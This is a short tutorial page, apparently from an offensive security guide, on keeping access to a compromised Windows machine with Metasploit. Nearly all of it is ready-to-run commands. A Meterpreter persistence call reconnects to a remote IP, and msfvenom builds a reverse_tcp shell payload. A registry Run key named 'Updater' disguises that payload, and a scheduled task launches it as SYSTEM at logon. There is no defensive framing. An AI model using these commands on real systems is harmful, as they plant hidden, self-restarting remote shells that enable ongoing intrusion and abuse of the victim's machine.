Skip to content

17. Metasploit Persistence

Persistence ensures you retain access to the compromised machine after a reboot or loss of session.

A. Meterpreter Persistence Module

Run the following in Meterpreter:

run persistence -U -i 10 -p 4444 -r 192.168.1.10
  • -U: Start on user logon.
  • -i 10: Retry interval in seconds.
  • -p 4444: Port to connect.
  • -r 192.168.1.10: Remote IP.

B. Windows Registry Key

Add a payload to the registry:

  1. Generate payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe

  2. Add to registry via PowerShell:

    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "C:\path\to\payload.exe"

C. Scheduled Task

Create a task to execute payload:

schtasks /create /tn "Updater" /tr "C:\path\to\payload.exe" /sc onlogon /ru SYSTEM